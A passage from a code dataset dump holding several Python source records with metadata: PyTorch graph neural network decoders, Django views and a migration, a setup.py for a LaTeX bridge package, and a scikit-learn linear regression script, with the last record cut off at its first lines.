1) * inputs.size(1), -1)\n x = self.mlp1(x)\n x_skip = x\n\n if self.factor:\n x = self.edge2node(x, rel_rec, rel_send)\n x = self.mlp2(x)\n\n x = self.node2edge(x, rel_rec, rel_send)\n x = torch.cat((x, x_skip), dim=2) # Skip connection\n x = self.mlp3(x)\n\n return self.fc_out(x)\n\n\nclass MLPDecoder(nn.Module):\n \"\"\"MLP decoder module.\"\"\"\n\n def __init__(self, n_in_node, edge_types, msg_hid, msg_out, n_hid,\n do_prob=0., skip_first=False):\n super(MLPDecoder, self).__init__()\n self.msg_fc1 = nn.ModuleList(\n [nn.Linear(2 * n_in_node, msg_hid) for _ in range(edge_types)])\n self.msg_fc2 = nn.ModuleList(\n [nn.Linear(msg_hid, msg_out) for _ in range(edge_types)])\n self.msg_out_shape = msg_out\n self.skip_first_edge_type = skip_first\n\n self.out_fc1 = nn.Linear(n_in_node + msg_out, n_hid)\n self.out_fc2 = nn.Linear(n_hid, n_hid)\n self.out_fc3 = nn.Linear(n_hid, n_in_node)\n\n print('Using learned interaction net decoder.')\n\n self.dropout_prob = do_prob\n\n def single_step_forward(self, single_timestep_inputs, rel_rec, rel_send,\n single_timestep_rel_type):\n\n # single_timestep_inputs has shape\n # [batch_size, num_timesteps, num_atoms, num_dims]\n\n # single_timestep_rel_type has shape:\n # [batch_size, num_timesteps, num_atoms*(num_atoms-1), num_edge_types]\n\n # Node2edge\n receivers = torch.matmul(rel_rec, 
single_timestep_inputs)\n senders = torch.matmul(rel_send, single_timestep_inputs)\n pre_msg = torch.cat([receivers, senders], dim=-1)\n\n all_msgs = Variable(torch.zeros(pre_msg.size(0), pre_msg.size(1),\n pre_msg.size(2), self.msg_out_shape))\n if single_timestep_inputs.is_cuda:\n all_msgs = all_msgs.cuda()\n\n if self.skip_first_edge_type:\n start_idx = 1\n else:\n start_idx = 0\n\n # Run separate MLP for every edge type\n # NOTE: To exclude one edge type, simply offset range by 1\n for i in range(start_idx, len(self.msg_fc2)):\n msg = F.relu(self.msg_fc1[i](pre_msg))\n msg = F.dropout(msg, p=self.dropout_prob)\n msg = F.relu(self.msg_fc2[i](msg))\n msg = msg * single_timestep_rel_type[:, :, :, i:i + 1]\n all_msgs += msg\n\n # Aggregate all msgs to receiver\n agg_msgs = all_msgs.transpose(-2, -1).matmul(rel_rec).transpose(-2, -1)\n agg_msgs = agg_msgs.contiguous()\n\n # Skip connection\n aug_inputs = torch.cat([single_timestep_inputs, agg_msgs], dim=-1)\n\n # Output MLP\n pred = F.dropout(F.relu(self.out_fc1(aug_inputs)), p=self.dropout_prob)\n pred = F.dropout(F.relu(self.out_fc2(pred)), p=self.dropout_prob)\n pred = self.out_fc3(pred)\n\n # Predict position/velocity difference\n return single_timestep_inputs + pred\n\n def forward(self, inputs, rel_type, rel_rec, rel_send, pred_steps=1):\n # NOTE: Assumes that we have the same graph across all samples.\n\n inputs = inputs.transpose(1, 2).contiguous()\n\n sizes = [rel_type.size(0), inputs.size(1), rel_type.size(1),\n rel_type.size(2)]\n rel_type = rel_type.unsqueeze(1).expand(sizes)\n\n time_steps = inputs.size(1)\n assert (pred_steps <= time_steps)\n preds = []\n\n # Only take n-th timesteps as starting points (n: pred_steps)\n last_pred = inputs[:, 0::pred_steps, :, :]\n curr_rel_type = rel_type[:, 0::pred_steps, :, :]\n # NOTE: Assumes rel_type is constant (i.e. 
same across all time steps).\n\n # Run n prediction steps\n for step in range(0, pred_steps):\n last_pred = self.single_step_forward(last_pred, rel_rec, rel_send,\n curr_rel_type)\n preds.append(last_pred)\n\n sizes = [preds[0].size(0), preds[0].size(1) * pred_steps,\n preds[0].size(2), preds[0].size(3)]\n\n output = Variable(torch.zeros(sizes))\n if inputs.is_cuda:\n output = output.cuda()\n\n # Re-assemble correct timeline\n for i in range(len(preds)):\n output[:, i::pred_steps, :, :] = preds[i]\n\n pred_all = output[:, :(inputs.size(1) - 1), :, :]\n\n return pred_all.transpose(1, 2).contiguous()\n\n\nclass RNNDecoder(nn.Module):\n \"\"\"Recurrent decoder module.\"\"\"\n\n def __init__(self, n_in_node, edge_types, n_hid,\n do_prob=0., skip_first=False):\n super(RNNDecoder, self).__init__()\n self.msg_fc1 = nn.ModuleList(\n [nn.Linear(2 * n_hid, n_hid) for _ in range(edge_types)])\n self.msg_fc2 = nn.ModuleList(\n [nn.Linear(n_hid, n_hid) for _ in range(edge_types)])\n self.msg_out_shape = n_hid\n self.skip_first_edge_type = skip_first\n\n self.hidden_r = nn.Linear(n_hid, n_hid, bias=False)\n self.hidden_i = nn.Linear(n_hid, n_hid, bias=False)\n self.hidden_h = nn.Linear(n_hid, n_hid, bias=False)\n\n self.input_r = nn.Linear(n_in_node, n_hid, bias=True)\n self.input_i = nn.Linear(n_in_node, n_hid, bias=True)\n self.input_n = nn.Linear(n_in_node, n_hid, bias=True)\n\n self.out_fc1 = nn.Linear(n_hid, n_hid)\n self.out_fc2 = nn.Linear(n_hid, n_hid)\n self.out_fc3 = nn.Linear(n_hid, n_in_node)\n\n print('Using learned recurrent interaction net decoder.')\n\n self.dropout_prob = do_prob\n\n def single_step_forward(self, inputs, rel_rec, rel_send,\n rel_type, hidden):\n\n # node2edge\n receivers = torch.matmul(rel_rec, hidden)\n senders = torch.matmul(rel_send, hidden)\n pre_msg = torch.cat([receivers, senders], dim=-1)\n\n all_msgs = Variable(torch.zeros(pre_msg.size(0), pre_msg.size(1),\n self.msg_out_shape))\n if inputs.is_cuda:\n all_msgs = all_msgs.cuda()\n\n if self.skip_first_edge_type:\n start_idx = 1\n norm = float(len(self.msg_fc2)) - 1.\n else:\n start_idx = 0\n norm = float(len(self.msg_fc2))\n\n # Run separate MLP for every edge type\n # NOTE: To exclude one edge type, simply offset range by 1\n for i in range(start_idx, len(self.msg_fc2)):\n msg = F.tanh(self.msg_fc1[i](pre_msg))\n msg = F.dropout(msg, p=self.dropout_prob)\n msg = F.tanh(self.msg_fc2[i](msg))\n msg = msg * rel_type[:, :, i:i + 1]\n all_msgs += msg / norm\n\n agg_msgs = all_msgs.transpose(-2, -1).matmul(rel_rec).transpose(-2,\n -1)\n agg_msgs = agg_msgs.contiguous() / inputs.size(2) # Average\n\n # GRU-style gated aggregation\n r = F.sigmoid(self.input_r(inputs) + self.hidden_r(agg_msgs))\n i = F.sigmoid(self.input_i(inputs) + self.hidden_i(agg_msgs))\n n = F.tanh(self.input_n(inputs) + r * self.hidden_h(agg_msgs))\n hidden = (1 - i) * n + i * hidden\n\n # Output MLP\n pred = F.dropout(F.relu(self.out_fc1(hidden)), p=self.dropout_prob)\n pred = F.dropout(F.relu(self.out_fc2(pred)), p=self.dropout_prob)\n pred = self.out_fc3(pred)\n\n # Predict position/velocity difference\n pred = inputs + pred\n\n return pred, hidden\n\n def forward(self, data, rel_type, rel_rec, rel_send, pred_steps=1,\n burn_in=False, burn_in_steps=1, dynamic_graph=False,\n encoder=None, temp=None):\n\n inputs = data.transpose(1, 2).contiguous()\n\n time_steps = inputs.size(1)\n\n # inputs has shape\n # [batch_size, num_timesteps, num_atoms, num_dims]\n\n # rel_type has shape:\n # [batch_size, num_atoms*(num_atoms-1), num_edge_types]\n\n hidden = 
Variable(\n torch.zeros(inputs.size(0), inputs.size(2), self.msg_out_shape))\n if inputs.is_cuda:\n hidden = hidden.cuda()\n\n pred_all = []\n\n for step in range(0, inputs.size(1) - 1):\n\n if burn_in:\n if step <= burn_in_steps:\n ins = inputs[:, step, :, :]\n else:\n ins = pred_all[step - 1]\n else:\n assert (pred_steps <= time_steps)\n # Use ground truth trajectory input vs. last prediction\n if not step % pred_steps:\n ins = inputs[:, step, :, :]\n else:\n ins = pred_all[step - 1]\n\n if dynamic_graph and step >= burn_in_steps:\n # NOTE: Assumes burn_in_steps = args.timesteps\n logits = encoder(\n data[:, :, step - burn_in_steps:step, :].contiguous(),\n rel_rec, rel_send)\n rel_type = gumbel_softmax(logits, tau=temp, hard=True)\n\n pred, hidden = self.single_step_forward(ins, rel_rec, rel_send,\n rel_type, hidden)\n pred_all.append(pred)\n\n preds = torch.stack(pred_all, dim=1)\n\n return preds.transpose(1, 2).contiguous()\n", "repo_name": "gaxler/comb2vec", "sub_path": "comb2vec/models/graph_nn.py", "file_name": "graph_nn.py", "file_ext": "py", "file_size_in_byte": 17118, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "utils.EPSILON", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 14, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 28, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 28, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_normal", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 29, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 29, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 31, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 31, "usage_type": "name"}, {"api_name": "torch.nn.functional.elu", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 43, "usage_type": "name"}, {"api_name": "torch.nn.functional.dropout", "line_number": 44, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 44, "usage_type": "name"}, {"api_name": "torch.nn.functional.elu", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 45, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 49, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 49, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool1d", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 52, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 56, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 56, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 57, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.nn", 
"line_number": 58, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 59, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 60, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 61, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 68, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 68, "usage_type": "name"}, {"api_name": "math.sqrt", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 72, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 72, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 79, "usage_type": "name"}, {"api_name": "torch.nn.functional.dropout", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 81, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 83, "usage_type": "name"}, {"api_name": "utils.my_softmax", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 92, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 92, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 107, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 112, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 112, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_normal", "line_number": 113, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 113, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 113, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 118, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 123, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 125, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 149, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 149, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 154, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 154, "usage_type": "name"}, {"api_name": "torch.nn.BCEWithLogitsLoss", "line_number": 156, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 156, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 163, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 163, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 174, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 174, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 185, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 185, "usage_type": "name"}, {"api_name": "torch.nn.init.xavier_normal", "line_number": 186, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 186, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 186, "usage_type": "name"}, {"api_name": 
"torch.matmul", "line_number": 194, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 199, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 207, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 212, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 217, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 218, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 219, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 236, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 242, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 242, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 248, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 248, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 249, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 249, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 250, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 250, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 251, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 251, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 255, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 255, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 256, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 256, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 257, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 257, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 273, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 274, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 275, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 277, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 277, "usage_type": "call"}, {"api_name": "torch.nn.functional.relu", "line_number": 290, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 290, "usage_type": "name"}, {"api_name": "torch.nn.functional.dropout", "line_number": 291, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 291, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 292, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 292, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 301, "usage_type": "call"}, {"api_name": "torch.nn.functional.dropout", "line_number": 304, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 304, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 304, "usage_type": "call"}, {"api_name": "torch.nn.functional.dropout", "line_number": 305, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 305, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 305, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 338, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 338, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 351, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 351, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 357, "usage_type": "call"}, {"api_name": "torch.nn", 
"line_number": 357, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 358, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 358, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 359, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 359, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 360, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 360, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 364, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 364, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 365, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 365, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 366, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 366, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 368, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 368, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 369, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 369, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 370, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 370, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 372, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 372, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 373, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 373, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 374, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 374, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 384, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 385, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 386, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 388, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 388, "usage_type": "call"}, {"api_name": "torch.nn.functional.tanh", "line_number": 403, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 403, "usage_type": "name"}, {"api_name": "torch.nn.functional.dropout", "line_number": 404, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 404, "usage_type": "name"}, {"api_name": "torch.nn.functional.tanh", "line_number": 405, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 405, "usage_type": "name"}, {"api_name": "torch.nn.functional.sigmoid", "line_number": 414, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 414, "usage_type": "name"}, {"api_name": "torch.nn.functional.sigmoid", "line_number": 415, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 415, "usage_type": "name"}, {"api_name": "torch.nn.functional.tanh", "line_number": 416, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 416, "usage_type": "name"}, {"api_name": "torch.nn.functional.dropout", "line_number": 420, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 420, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 420, "usage_type": "call"}, {"api_name": "torch.nn.functional.dropout", "line_number": 421, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 421, "usage_type": "name"}, {"api_name": 
"torch.nn.functional.relu", "line_number": 421, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 443, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 444, "usage_type": "call"}, {"api_name": "utils.distibutions.gumbel_softmax", "line_number": 470, "usage_type": "call"}, {"api_name": "torch.stack", "line_number": 476, "usage_type": "call"}]} +{"seq_id": "72058569154", "text": "from django.shortcuts import render\r\n\r\n# Create your views here.\r\nfrom django.shortcuts import render\r\nfrom brands.models import Brand\r\nfrom model.models import Model, Series\r\n\r\n\r\ndef model_details(request, id):\r\n brand = Brand.objects.get(id=id)\r\n models = Model.objects.filter(brand=brand)\r\n data = {\r\n 'brand': brand,\r\n \"models\": models,\r\n }\r\n return render(request, \"detail.html\", context=data)\r\n\r\n\r\ndef series_detail(request, model_id, brand_id):\r\n model = Model.objects.get(id=model_id)\r\n brand = Brand.objects.get(id=brand_id)\r\n series = Series.objects.filter(model=model)\r\n data = {\r\n \"model\": model,\r\n \"series\": series,\r\n 'brand': brand,\r\n }\r\n return render(request, \"series.html\", context=data)\r\n\r\n\r\n", "repo_name": "denis2000001/hw4", "sub_path": "model/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 778, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "brands.models.Brand.objects.get", "line_number": 10, "usage_type": "call"}, {"api_name": "brands.models.Brand.objects", "line_number": 10, "usage_type": "attribute"}, {"api_name": "brands.models.Brand", "line_number": 10, "usage_type": "name"}, {"api_name": "model.models.Model.objects.filter", "line_number": 11, "usage_type": "call"}, {"api_name": "model.models.Model.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "model.models.Model", "line_number": 11, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 16, "usage_type": "call"}, {"api_name": "model.models", "line_number": 20, "usage_type": "name"}, {"api_name": "model.models.Model.objects.get", "line_number": 20, "usage_type": "call"}, {"api_name": "model.models.Model.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "model.models.Model", "line_number": 20, "usage_type": "name"}, {"api_name": "brands.models.Brand.objects.get", "line_number": 21, "usage_type": "call"}, {"api_name": "brands.models.Brand.objects", "line_number": 21, "usage_type": "attribute"}, {"api_name": "brands.models.Brand", "line_number": 21, "usage_type": "name"}, {"api_name": "model.models.Series.objects.filter", "line_number": 22, "usage_type": "call"}, {"api_name": "model.models.Series.objects", "line_number": 22, "usage_type": "attribute"}, {"api_name": "model.models.Series", "line_number": 22, "usage_type": "name"}, {"api_name": "model.models", "line_number": 22, "usage_type": "name"}, {"api_name": "model.models", "line_number": 24, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "257590610", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('dianjiangapp', '0025_auto_20160422_2108'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='user',\n name='shenfengzhengid',\n field=models.CharField(max_length=255, 
verbose_name='\\u8eab\\u4efd\\u8bc1', blank=True),\n ),\n ]\n", "repo_name": "chenfengqiannian/djdianjiang", "sub_path": "dianjiangapp/migrations/0026_user_shenfengzhengid.py", "file_name": "0026_user_shenfengzhengid.py", "file_ext": "py", "file_size_in_byte": 460, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.AddField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}]} +{"seq_id": "41575240097", "text": "from pathlib import Path\nfrom setuptools import setup, find_packages\n\nfolder = Path(__file__).parent\nreadme = (folder / 'README.md').read_text()\n\nsetup(\n name='python-latex-bridge',\n version='0.0.1',\n description='Include python variable values in a LaTeX document',\n long_description=readme,\n long_description_content_type='text/markdown',\n url='https://github.com/timmedia/python-latex-bridge',\n author='Tim Mutkala',\n author_email='contact@tim-media.com',\n license='MIT',\n packages=find_packages(exclude=('tests',)),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n include_package_data=True\n)", "repo_name": "timmedia/python-latex-bridge", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 749, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pathlib.Path", "line_number": 4, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 7, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "40071519336", "text": "# Simple Linear Regression Example\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 25 14:15:04 2018\n\n@author: Ali R. Memon\n@file: simple_linear_regression.py\n@date: 25.05.2018\n\"\"\"\n\n# Importing Libraries\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# Importing the dataset\ndataset = pd.read_csv('Salary_Data.csv')\nX = dataset.iloc[:, :-1].values\ny = dataset.iloc[:, 1].values\n\n# Splitting the dataset\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.3, random_state=0)\n\n# No need to apply Feature Scaling in Linear Regression. 
Algorithms take care of this.\n\n# Filliting model to training set\nfrom sklearn.linear_model import LinearRegression\nregressor = LinearRegression()\nregressor.fit(X_train, y_train)\n\n# Making predictions and compare predictions with y_test dataset\ny_predictor = regressor.predict(X_test)\nX_predictor = regressor.predict(X_train)\n\n# Visualizing training set results\nplt.scatter(X_train,y_train, color='red')\nplt.plot(X_train, X_predictor, color = 'blue')\nplt.title('Salary vs Experience (Training set)')\nplt.xlabel('Years of Experience')\nplt.ylabel('Salary')\nplt.show()\n\n# Visualizing test set results\nplt.scatter(X_test,y_test, color='red')\nplt.plot(X_train, X_predictor, color = 'blue')\nplt.title('Salary vs Experience (Training set)')\nplt.xlabel('Years of Experience')\nplt.ylabel('Salary')\nplt.show()\n\n \n\n\n\n\n\n\n\n\n\n\n", "repo_name": "memon-aliraza/python_machine_Learning", "sub_path": "regression/simple_linear_regression/simple_linear_regression.py", "file_name": "simple_linear_regression.py", "file_ext": "py", "file_size_in_byte": 1448, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.read_csv", "line_number": 19, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 25, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 48, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 48, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 49, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 49, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}]} +{"seq_id": "905794593", "text": "from __future__ import unicode_literals, division, absolute_import\nfrom builtins import * # noqa pylint: disable=unused-import, redefined-builtin\n\nimport 
